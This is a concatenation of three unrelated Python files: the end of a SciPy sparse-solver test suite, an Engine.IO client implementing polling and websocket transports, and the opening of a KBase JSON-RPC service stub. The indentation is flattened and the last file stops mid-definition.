def not_c_contig(x):
return x.repeat(2)[::2]
def not_1dim(x):
return x[:,None]
def bad_type(x):
return x.astype(bool)
def too_short(x):
return x[:-1]
badops = [not_c_contig, not_1dim, bad_type, too_short]
for badop in badops:
msg = "%r %r" % (spmatrix, badop)
# Not C-contiguous
assert_raises((ValueError, TypeError), _superlu.gssv,
N, A.nnz, badop(A.data), A.indices, A.indptr,
b, int(spmatrix == csc_matrix), err_msg=msg)
assert_raises((ValueError, TypeError), _superlu.gssv,
N, A.nnz, A.data, badop(A.indices), A.indptr,
b, int(spmatrix == csc_matrix), err_msg=msg)
assert_raises((ValueError, TypeError), _superlu.gssv,
N, A.nnz, A.data, A.indices, badop(A.indptr),
b, int(spmatrix == csc_matrix), err_msg=msg)
def test_sparsity_preservation(self):
ident = csc_matrix([
[1, 0, 0],
[0, 1, 0],
[0, 0, 1]])
b = csc_matrix([
[0, 1],
[1, 0],
[0, 0]])
x = spsolve(ident, b)
assert_equal(ident.nnz, 3)
assert_equal(b.nnz, 2)
assert_equal(x.nnz, 2)
assert_allclose(x.A, b.A, atol=1e-12, rtol=1e-12)
def test_dtype_cast(self):
A_real = scipy.sparse.csr_matrix([[1, 2, 0],
[0, 0, 3],
[4, 0, 5]])
A_complex = scipy.sparse.csr_matrix([[1, 2, 0],
[0, 0, 3],
[4, 0, 5 + 1j]])
b_real = np.array([1,1,1])
b_complex = np.array([1,1,1]) + 1j*np.array([1,1,1])
x = spsolve(A_real, b_real)
assert_(np.issubdtype(x.dtype, np.floating))
x = spsolve(A_real, b_complex)
assert_(np.issubdtype(x.dtype, np.complexfloating))
x = spsolve(A_complex, b_real)
assert_(np.issubdtype(x.dtype, np.complexfloating))
x = spsolve(A_complex, b_complex)
assert_(np.issubdtype(x.dtype, np.complexfloating))
class TestSplu(object):
def setup_method(self):
use_solver(useUmfpack=False)
n = 40
d = arange(n) + 1
self.n = n
self.A = spdiags((d, 2*d, d[::-1]), (-3, 0, 5), n, n)
random.seed(1234)
def _smoketest(self, spxlu, check, dtype):
if np.issubdtype(dtype, np.complexfloating):
A = self.A + 1j*self.A.T
else:
A = self.A
A = A.astype(dtype)
lu = spxlu(A)
rng = random.RandomState(1234)
# Input shapes
for k in [None, 1, 2, self.n, self.n+2]:
msg = "k=%r" % (k,)
if k is None:
b = rng.rand(self.n)
else:
b = rng.rand(self.n, k)
if np.issubdtype(dtype, np.complexfloating):
b = b + 1j*rng.rand(*b.shape)
b = b.astype(dtype)
x = lu.solve(b)
check(A, b, x, msg)
x = lu.solve(b, 'T')
check(A.T, b, x, msg)
x = lu.solve(b, 'H')
check(A.T.conj(), b, x, msg)
@sup_sparse_efficiency
def test_splu_smoketest(self):
self._internal_test_splu_smoketest()
def _internal_test_splu_smoketest(self):
# Check that splu works at all
def check(A, b, x, msg=""):
eps = np.finfo(A.dtype).eps
r = A * x
assert_(abs(r - b).max() < 1e3*eps, msg)
self._smoketest(splu, check, np.float32)
self._smoketest(splu, check, np.float64)
self._smoketest(splu, check, np.complex64)
self._smoketest(splu, check, np.complex128)
@sup_sparse_efficiency
def test_spilu_smoketest(self):
self._internal_test_spilu_smoketest()
def _internal_test_spilu_smoketest(self):
errors = []
def check(A, b, x, msg=""):
r = A * x
err = abs(r - b).max()
assert_(err < 1e-2, msg)
if b.dtype in (np.float64, np.complex128):
errors.append(err)
self._smoketest(spilu, check, np.float32)
self._smoketest(spilu, check, np.float64)
self._smoketest(spilu, check, np.complex64)
self._smoketest(spilu, check, np.complex128)
assert_(max(errors) > 1e-5)
@sup_sparse_efficiency
def test_spilu_drop_rule(self):
# Test passing in the drop_rule argument to spilu.
A = identity(2)
rules = [
b'basic,area'.decode('ascii'), # unicode
b'basic,area', # ascii
[b'basic', b'area'.decode('ascii')]
]
for rule in rules:
# Argument should be accepted
assert_(isinstance(spilu(A, drop_rule=rule), SuperLU))
def test_splu_nnz0(self):
A = csc_matrix((5,5), dtype='d')
assert_raises(RuntimeError, splu, A)
def test_spilu_nnz0(self):
A = csc_matrix((5,5), dtype='d')
assert_raises(RuntimeError, spilu, A)
def test_splu_basic(self):
# Test basic splu functionality.
n = 30
rng = random.RandomState(12)
a = rng.rand(n, n)
a[a < 0.95] = 0
# First test with a singular matrix
a[:, 0] = 0
a_ = csc_matrix(a)
# Matrix is exactly singular
assert_raises(RuntimeError, splu, a_)
# Make a diagonal dominant, to make sure it is not singular
a += 4*eye(n)
a_ = csc_matrix(a)
lu = splu(a_)
b = ones(n)
x = lu.solve(b)
assert_almost_equal(dot(a, x), b)
def test_splu_perm(self):
# Test the permutation vectors exposed by splu.
n = 30
a = random.random((n, n))
a[a < 0.95] = 0
# Make a diagonal dominant, to make sure it is not singular
a += 4*eye(n)
a_ = csc_matrix(a)
lu = splu(a_)
# Check that the permutation indices do belong to [0, n-1].
for perm in (lu.perm_r, lu.perm_c):
assert_(all(perm > -1))
assert_(all(perm < n))
assert_equal(len(unique(perm)), len(perm))
# Now make a symmetric, and test that the two permutation vectors are
# the same
# Note: a += a.T relies on undefined behavior.
a = a + a.T
a_ = csc_matrix(a)
lu = splu(a_)
assert_array_equal(lu.perm_r, lu.perm_c)
@pytest.mark.skipif(not hasattr(sys, 'getrefcount'), reason="no sys.getrefcount")
def test_lu_refcount(self):
# Test that we are keeping track of the reference count with splu.
n = 30
a = random.random((n, n))
a[a < 0.95] = 0
# Make a diagonal dominant, to make sure it is not singular
a += 4*eye(n)
a_ = csc_matrix(a)
lu = splu(a_)
# And now test that we don't have a refcount bug
rc = sys.getrefcount(lu)
for attr in ('perm_r', 'perm_c'):
perm = getattr(lu, attr)
assert_equal(sys.getrefcount(lu), rc + 1)
del perm
assert_equal(sys.getrefcount(lu), rc)
def test_bad_inputs(self):
A = self.A.tocsc()
assert_raises(ValueError, splu, A[:,:4])
assert_raises(ValueError, spilu, A[:,:4])
for lu in [splu(A), spilu(A)]:
b = random.rand(42)
B = random.rand(42, 3)
BB = random.rand(self.n, 3, 9)
assert_raises(ValueError, lu.solve, b)
assert_raises(ValueError, lu.solve, B)
assert_raises(ValueError, lu.solve, BB)
assert_raises(TypeError, lu.solve,
b.astype(np.complex64))
assert_raises(TypeError, lu.solve,
b.astype(np.complex128))
@sup_sparse_efficiency
def test_superlu_dlamch_i386_nan(self):
# SuperLU 4.3 calls some functions returning floats without
# declaring them. On i386@linux call convention, this fails to
# clear floating point registers after call. As a result, NaN
# can appear in the next floating point operation made.
#
# Here's a test case that triggered the issue.
n = 8
d = np.arange(n) + 1
A = spdiags((d, 2*d, d[::-1]), (-3, 0, 5), n, n)
A = A.astype(np.float32)
spilu(A)
A = A + 1j*A
B = A.A
assert_(not np.isnan(B).any())
@sup_sparse_efficiency
def test_lu_attr(self):
def check(dtype, complex_2=False):
A = self.A.astype(dtype)
if complex_2:
A = A + 1j*A.T
n = A.shape[0]
lu = splu(A)
# Check that the decomposition is as advertized
Pc = np.zeros((n, n))
Pc[np.arange(n), lu.perm_c] = 1
Pr = np.zeros((n, n))
Pr[lu.perm_r, np.arange(n)] = 1
Ad = A.toarray()
lhs = Pr.dot(Ad).dot(Pc)
rhs = (lu.L * lu.U).toarray()
eps = np.finfo(dtype).eps
assert_allclose(lhs, rhs, atol=100*eps)
check(np.float32)
check(np.float64)
check(np.complex64)
check(np.complex128)
check(np.complex64, True)
check(np.complex128, True)
@pytest.mark.slow
@sup_sparse_efficiency
def test_threads_parallel(self):
oks = []
def worker():
try:
self.test_splu_basic()
self._internal_test_splu_smoketest()
self._internal_test_spilu_smoketest()
oks.append(True)
except Exception:
pass
threads = [threading.Thread(target=worker)
for k in range(20)]
for t in threads:
t.start()
for t in threads:
t.join()
assert_equal(len(oks), 20)
class TestSpsolveTriangular(object):
def setup_method(self):
use_solver(useUmfpack=False)
def test_singular(self):
n = 5
A = csr_matrix((n, n))
b = np.arange(n)
for lower in (True, False):
assert_raises(scipy.linalg.LinAlgError, spsolve_triangular, A, b, lower=lower)
@sup_sparse_efficiency
def test_bad_shape(self):
# A is not square.
A = np.zeros((3, 4))
b = ones((4, 1))
assert_raises(ValueError, spsolve_triangular, A, b)
# A2 and b2 have incompatible shapes.
A2 = csr_matrix(eye(3))
b2 = array([1.0, 2.0])
assert_raises(ValueError, spsolve_triangular, A2, b2)
@sup_sparse_efficiency
def test_input_types(self):
A = array([[1., 0.], [1., 2.]])
b = array([[2., 0.], [2., 2.]])
for matrix_type in (array, csc_matrix, csr_matrix):
x = spsolve_triangular(matrix_type(A), b, lower=True)
assert_array_almost_equal(A.dot(x), b)
@pytest.mark.slow
@sup_sparse_efficiency
def test_random(self):
def random_triangle_matrix(n, lower=True):
A = scipy.sparse.random(n, n, density=0.1, format='coo')
if lower:
A = scipy.sparse.tril(A)
else:
A = scipy.sparse.triu(A)
A = A.tocsr(copy=False)
for i in range(n):
A[i, i] = np.random.rand() + 1
return A
np.random.seed(1234)
for lower in (True, False):
for n in (10, 10**2, 10**3):
A = random_triangle_matrix(n, lower=lower)
for m in (1, 10):
for b in (np.random.rand(n, m),
np.random.randint(-9, 9, (n, m)),
np.random.randint(-9, 9, (n, m)) +
np.random.randint(-9, 9, (n, m)) * 1j):
x = spsolve_triangular(A, b, lower=lower)
assert_array_almost_equal(A.dot(x), b)
|
client.py
|
import logging
try:
import queue
except ImportError: # pragma: no cover
import Queue as queue
import signal
import threading
import time
import six
from six.moves import urllib
try:
import requests
except ImportError: # pragma: no cover
requests = None
try:
import websocket
except ImportError: # pragma: no cover
websocket = None
from . import exceptions
from . import packet
from . import payload
default_logger = logging.getLogger('engineio.client')
connected_clients = []
if six.PY2: # pragma: no cover
ConnectionError = OSError
def signal_handler(sig, frame):
"""SIGINT handler.
Disconnect all active clients and then invoke the original signal handler.
"""
for client in connected_clients[:]:
if client.is_asyncio_based():
client.start_background_task(client.disconnect, abort=True)
else:
client.disconnect(abort=True)
return original_signal_handler(sig, frame)
original_signal_handler = signal.signal(signal.SIGINT, signal_handler)
class Client(object):
"""An Engine.IO client.
This class implements a fully compliant Engine.IO web client with support
for websocket and long-polling transports.
:param logger: To enable logging set to ``True`` or pass a logger object to
use. To disable logging set to ``False``. The default is
``False``.
:param json: An alternative json module to use for encoding and decoding
packets. Custom json modules must have ``dumps`` and ``loads``
functions that are compatible with the standard library
versions.
"""
event_names = ['connect', 'disconnect', 'message']
def __init__(self, logger=False, json=None):
self.handlers = {}
self.base_url = None
self.transports = None
self.current_transport = None
self.sid = None
self.upgrades = None
self.ping_interval = None
self.ping_timeout = None
self.pong_received = True
self.http = None
self.ws = None
self.read_loop_task = None
self.write_loop_task = None
self.ping_loop_task = None
self.ping_loop_event = self.create_event()
self.queue = None
self.state = 'disconnected'
if json is not None:
packet.Packet.json = json
if not isinstance(logger, bool):
self.logger = logger
else:
self.logger = default_logger
if not logging.root.handlers and \
self.logger.level == logging.NOTSET:
if logger:
self.logger.setLevel(logging.INFO)
else:
self.logger.setLevel(logging.ERROR)
self.logger.addHandler(logging.StreamHandler())
def is_asyncio_based(self):
return False
def on(self, event, handler=None):
"""Register an event handler.
:param event: The event name. Can be ``'connect'``, ``'message'`` or
``'disconnect'``.
:param handler: The function that should be invoked to handle the
event. When this parameter is not given, the method
acts as a decorator for the handler function.
Example usage::
# as a decorator:
@eio.on('connect')
def connect_handler():
print('Connection request')
# as a method:
def message_handler(msg):
print('Received message: ', msg)
eio.send('response')
eio.on('message', message_handler)
"""
if event not in self.event_names:
raise ValueError('Invalid event')
def set_handler(handler):
self.handlers[event] = handler
return handler
if handler is None:
return set_handler
set_handler(handler)
def connect(self, url, headers={}, transports=None,
engineio_path='engine.io'):
"""Connect to an Engine.IO server.
:param url: The URL of the Engine.IO server. It can include custom
query string parameters if required by the server.
:param headers: A dictionary with custom headers to send with the
connection request.
:param transports: The list of allowed transports. Valid transports
are ``'polling'`` and ``'websocket'``. If not
given, the polling transport is connected first,
then an upgrade to websocket is attempted.
:param engineio_path: The endpoint where the Engine.IO server is
installed. The default value is appropriate for
most cases.
Example usage::
eio = engineio.Client()
eio.connect('http://localhost:5000')
"""
if self.state != 'disconnected':
raise ValueError('Client is not in a disconnected state')
valid_transports = ['polling', 'websocket']
if transports is not None:
if isinstance(transports, six.string_types):
transports = [transports]
transports = [transport for transport in transports
if transport in valid_transports]
if not transports:
raise ValueError('No valid transports provided')
self.transports = transports or valid_transports
self.queue = self.create_queue()
return getattr(self, '_connect_' + self.transports[0])(
url, headers, engineio_path)
def wait(self):
"""Wait until the connection with the server ends.
Client applications can use this function to block the main thread
during the life of the connection.
"""
if self.read_loop_task:
self.read_loop_task.join()
def send(self, data, binary=None):
"""Send a message to a client.
:param data: The data to send to the client. Data can be of type
``str``, ``bytes``, ``list`` or ``dict``. If a ``list``
or ``dict``, the data will be serialized as JSON.
:param binary: ``True`` to send packet as binary, ``False`` to send
as text. If not given, unicode (Python 2) and str
(Python 3) are sent as text, and str (Python 2) and
bytes (Python 3) are sent as binary.
"""
self._send_packet(packet.Packet(packet.MESSAGE, data=data,
binary=binary))
def disconnect(self, abort=False):
"""Disconnect from the server.
:param abort: If set to ``True``, do not wait for background tasks
associated with the connection to end.
"""
if self.state == 'connected':
self._send_packet(packet.Packet(packet.CLOSE))
self.queue.put(None)
self.state = 'disconnecting'
self._trigger_event('disconnect', run_async=False)
if self.current_transport == 'websocket':
self.ws.close()
if not abort:
self.read_loop_task.join()
self.state = 'disconnected'
try:
connected_clients.remove(self)
except ValueError: # pragma: no cover
pass
self._reset()
def transport(self):
"""Return the name of the transport currently in use.
The possible values returned by this function are ``'polling'`` and
``'websocket'``.
"""
return self.current_transport
def start_background_task(self, target, *args, **kwargs):
"""Start a background task.
This is a utility function that applications can use to start a
background task.
:param target: the target function to execute.
:param args: arguments to pass to the function.
:param kwargs: keyword arguments to pass to the function.
This function returns an object compatible with the `Thread` class in
the Python standard library. The `start()` method on this object is
already called by this function.
"""
th = threading.Thread(target=target, args=args, kwargs=kwargs)
th.start()
return th
def sleep(self, seconds=0):
"""Sleep for the requested amount of time."""
return time.sleep(seconds)
def create_queue(self, *args, **kwargs):
"""Create a queue object."""
q = queue.Queue(*args, **kwargs)
q.Empty = queue.Empty
return q
def create_event(self, *args, **kwargs):
"""Create an event object."""
return threading.Event(*args, **kwargs)
def _reset(self):
self.state = 'disconnected'
self.sid = None
def _connect_polling(self, url, headers, engineio_path):
"""Establish a long-polling connection to the Engine.IO server."""
if requests is None: # pragma: no cover
# not installed
self.logger.error('requests package is not installed -- cannot '
'send HTTP requests!')
return
self.base_url = self._get_engineio_url(url, engineio_path, 'polling')
self.logger.info('Attempting polling connection to ' + self.base_url)
r = self._send_request(
'GET', self.base_url + self._get_url_timestamp(), headers=headers)
if r is None:
self._reset()
raise exceptions.ConnectionError(
'Connection refused by the server')
if r.status_code != 200:
raise exceptions.ConnectionError(
'Unexpected status code {} in server response'.format(
r.status_code))
try:
p = payload.Payload(encoded_payload=r.content)
except ValueError:
six.raise_from(exceptions.ConnectionError(
'Unexpected response from server'), None)
open_packet = p.packets[0]
if open_packet.packet_type != packet.OPEN:
raise exceptions.ConnectionError(
'OPEN packet not returned by server')
self.logger.info(
'Polling connection accepted with ' + str(open_packet.data))
self.sid = open_packet.data['sid']
self.upgrades = open_packet.data['upgrades']
self.ping_interval = open_packet.data['pingInterval'] / 1000.0
self.ping_timeout = open_packet.data['pingTimeout'] / 1000.0
self.current_transport = 'polling'
self.base_url += '&sid=' + self.sid
self.state = 'connected'
connected_clients.append(self)
self._trigger_event('connect', run_async=False)
for pkt in p.packets[1:]:
self._receive_packet(pkt)
if 'websocket' in self.upgrades and 'websocket' in self.transports:
# attempt to upgrade to websocket
if self._connect_websocket(url, headers, engineio_path):
# upgrade to websocket succeeded, we're done here
return
# start background tasks associated with this client
self.ping_loop_task = self.start_background_task(self._ping_loop)
self.write_loop_task = self.start_background_task(self._write_loop)
self.read_loop_task = self.start_background_task(
self._read_loop_polling)
def _connect_websocket(self, url, headers, engineio_path):
"""Establish or upgrade to a WebSocket connection with the server."""
if websocket is None: # pragma: no cover
# not installed
self.logger.warning('websocket-client package not installed, only '
'polling transport is available')
return False
websocket_url = self._get_engineio_url(url, engineio_path, 'websocket')
if self.sid:
self.logger.info(
'Attempting WebSocket upgrade to ' + websocket_url)
upgrade = True
websocket_url += '&sid=' + self.sid
else:
upgrade = False
self.base_url = websocket_url
self.logger.info(
'Attempting WebSocket connection to ' + websocket_url)
try:
ws = websocket.create_connection(
websocket_url + self._get_url_timestamp(), header=headers)
except ConnectionError:
if upgrade:
self.logger.warning(
'WebSocket upgrade failed: connection error')
return False
else:
raise exceptions.ConnectionError('Connection error')
if upgrade:
p = packet.Packet(packet.PING, data='probe').encode()
try:
ws.send(p)
except Exception as e: # pragma: no cover
self.logger.warning(
'WebSocket upgrade failed: unexpected send exception: %s',
str(e))
return False
try:
p = ws.recv()
except Exception as e: # pragma: no cover
self.logger.warning(
'WebSocket upgrade failed: unexpected recv exception: %s',
str(e))
return False
pkt = packet.Packet(encoded_packet=p)
if pkt.packet_type != packet.PONG or pkt.data != 'probe':
self.logger.warning(
'WebSocket upgrade failed: no PONG packet')
return False
p = packet.Packet(packet.UPGRADE).encode()
try:
ws.send(p)
except Exception as e: # pragma: no cover
self.logger.warning(
'WebSocket upgrade failed: unexpected send exception: %s',
str(e))
return False
self.current_transport = 'websocket'
self.logger.info('WebSocket upgrade was successful')
else:
try:
p = ws.recv()
except Exception as e: # pragma: no cover
raise exceptions.ConnectionError(
'Unexpected recv exception: ' + str(e))
open_packet = packet.Packet(encoded_packet=p)
if open_packet.packet_type != packet.OPEN:
raise exceptions.ConnectionError('no OPEN packet')
self.logger.info(
'WebSocket connection accepted with ' + str(open_packet.data))
self.sid = open_packet.data['sid']
self.upgrades = open_packet.data['upgrades']
self.ping_interval = open_packet.data['pingInterval'] / 1000.0
self.ping_timeout = open_packet.data['pingTimeout'] / 1000.0
self.current_transport = 'websocket'
self.state = 'connected'
connected_clients.append(self)
self._trigger_event('connect', run_async=False)
self.ws = ws
# start background tasks associated with this client
self.ping_loop_task = self.start_background_task(self._ping_loop)
self.write_loop_task = self.start_background_task(self._write_loop)
self.read_loop_task = self.start_background_task(
self._read_loop_websocket)
return True
def _receive_packet(self, pkt):
"""Handle incoming packets from the server."""
packet_name = packet.packet_names[pkt.packet_type] \
if pkt.packet_type < len(packet.packet_names) else 'UNKNOWN'
self.logger.info(
'Received packet %s data %s', packet_name,
pkt.data if not isinstance(pkt.data, bytes) else '<binary>')
if pkt.packet_type == packet.MESSAGE:
self._trigger_event('message', pkt.data, run_async=True)
elif pkt.packet_type == packet.PONG:
self.pong_received = True
elif pkt.packet_type == packet.NOOP:
pass
else:
self.logger.error('Received unexpected packet of type %s',
pkt.packet_type)
def _send_packet(self, pkt):
"""Queue a packet to be sent to the server."""
if self.state != 'connected':
return
self.queue.put(pkt)
self.logger.info(
'Sending packet %s data %s',
packet.packet_names[pkt.packet_type],
pkt.data if not isinstance(pkt.data, bytes) else '<binary>')
def _send_request(
self, method, url, headers=None, body=None): # pragma: no cover
if self.http is None:
self.http = requests.Session()
try:
return self.http.request(method, url, headers=headers, data=body)
except requests.exceptions.ConnectionError:
pass
def _trigger_event(self, event, *args, **kwargs):
"""Invoke an event handler."""
run_async = kwargs.pop('run_async', False)
if event in self.handlers:
if run_async:
return self.start_background_task(self.handlers[event], *args)
else:
try:
return self.handlers[event](*args)
except:
self.logger.exception(event + ' handler error')
def _get_engineio_url(self, url, engineio_path, transport):
"""Generate the Engine.IO connection URL."""
engineio_path = engineio_path.strip('/')
parsed_url = urllib.parse.urlparse(url)
if transport == 'polling':
scheme = 'http'
elif transport == 'websocket':
scheme = 'ws'
else: # pragma: no cover
raise ValueError('invalid transport')
if parsed_url.scheme in ['https', 'wss']:
scheme += 's'
return ('{scheme}://{netloc}/{path}/?{query}'
'{sep}transport={transport}&EIO=3').format(
scheme=scheme, netloc=parsed_url.netloc,
path=engineio_path, query=parsed_url.query,
sep='&' if parsed_url.query else '',
transport=transport)
def _get_url_timestamp(self):
"""Generate the Engine.IO query string timestamp."""
return '&t=' + str(time.time())
def _ping_loop(self):
"""This background task sends a PING to the server at the requested
interval.
"""
self.pong_received = True
self.ping_loop_event.clear()
while self.state == 'connected':
if not self.pong_received:
self.logger.warning(
'PONG response has not been received, aborting')
if self.ws:
self.ws.close()
self.queue.put(None)
break
self.pong_received = False
self._send_packet(packet.Packet(packet.PING))
self.ping_loop_event.wait(timeout=self.ping_interval)
self.logger.info('Exiting ping task')
def _read_loop_polling(self):
"""Read packets by polling the Engine.IO server."""
while self.state == 'connected':
self.logger.info(
'Sending polling GET request to ' + self.base_url)
r = self._send_request(
'GET', self.base_url + self._get_url_timestamp())
if r is None:
self.logger.warning(
'Connection refused by the server, aborting')
self.queue.put(None)
break
if r.status_code != 200:
self.logger.warning('Unexpected status code %s in server '
'response, aborting', r.status_code)
self.queue.put(None)
break
try:
p = payload.Payload(encoded_payload=r.content)
except ValueError:
self.logger.warning(
'Unexpected packet from server, aborting')
self.queue.put(None)
break
for pkt in p.packets:
self._receive_packet(pkt)
self.logger.info('Waiting for write loop task to end')
self.write_loop_task.join()
self.logger.info('Waiting for ping loop task to end')
self.ping_loop_event.set()
self.ping_loop_task.join()
if self.state == 'connected':
self._trigger_event('disconnect', run_async=False)
try:
connected_clients.remove(self)
except ValueError: # pragma: no cover
pass
self._reset()
self.logger.info('Exiting read loop task')
def _read_loop_websocket(self):
"""Read packets from the Engine.IO WebSocket connection."""
while self.state == 'connected':
p = None
try:
p = self.ws.recv()
except websocket.WebSocketConnectionClosedException:
self.logger.warning(
'WebSocket connection was closed, aborting')
self.queue.put(None)
break
except Exception as e:
self.logger.info(
'Unexpected error "%s", aborting', str(e))
self.queue.put(None)
break
if isinstance(p, six.text_type): # pragma: no cover
p = p.encode('utf-8')
pkt = packet.Packet(encoded_packet=p)
self._receive_packet(pkt)
self.logger.info('Waiting for write loop task to end')
self.write_loop_task.join()
self.logger.info('Waiting for ping loop task to end')
self.ping_loop_event.set()
self.ping_loop_task.join()
if self.state == 'connected':
self._trigger_event('disconnect', run_async=False)
try:
connected_clients.remove(self)
except ValueError: # pragma: no cover
pass
self._reset()
self.logger.info('Exiting read loop task')
def _write_loop(self):
"""This background task sends packages to the server as they are
pushed to the send queue.
"""
while self.state == 'connected':
# to simplify the timeout handling, use the maximum of the
# ping interval and ping timeout as timeout, with an extra 5
# seconds grace period
timeout = max(self.ping_interval, self.ping_timeout) + 5
packets = None
try:
packets = [self.queue.get(timeout=timeout)]
except self.queue.Empty:
self.logger.error('packet queue is empty, aborting')
self._reset()
break
if packets == [None]:
self.queue.task_done()
packets = []
else:
while True:
try:
packets.append(self.queue.get(block=False))
except self.queue.Empty:
break
if packets[-1] is None:
packets = packets[:-1]
self.queue.task_done()
break
if not packets:
# empty packet list returned -> connection closed
break
if self.current_transport == 'polling':
p = payload.Payload(packets=packets)
r = self._send_request(
'POST', self.base_url, body=p.encode(),
headers={'Content-Type': 'application/octet-stream'})
for pkt in packets:
self.queue.task_done()
if r is None:
self.logger.warning(
'Connection refused by the server, aborting')
break
if r.status_code != 200:
self.logger.warning('Unexpected status code %s in server '
'response, aborting', r.status_code)
self._reset()
break
else:
# websocket
try:
for pkt in packets:
self.ws.send(pkt.encode())
self.queue.task_done()
except websocket.WebSocketConnectionClosedException:
self.logger.warning(
'WebSocket connection was closed, aborting')
break
self.logger.info('Exiting write loop task')
|
ccl_ContigFilterServer.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
import json
import os
import random as _random
import sys
import traceback
from getopt import getopt, GetoptError
from multiprocessing import Process
from os import environ
from wsgiref.simple_server import make_server
import requests as _requests
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError, \
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from biokbase import log
from ccl_ContigFilter.authclient import KBaseAuth as _KBaseAuth
try:
from ConfigParser import ConfigParser
except ImportError:
from configparser import ConfigParser
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'ccl_ContigFilter'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from ccl_ContigFilter.ccl_ContigFilterImpl import ccl_ContigFilter # noqa @IgnorePep8
impl_ccl_ContigFilter = ccl_ContigFilter(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if len(e.args) == 1:
newerr.data = repr(e.args[0])
else:
newerr.data = repr(e.args)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if 'types' in self.method_data[request['method']]:
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
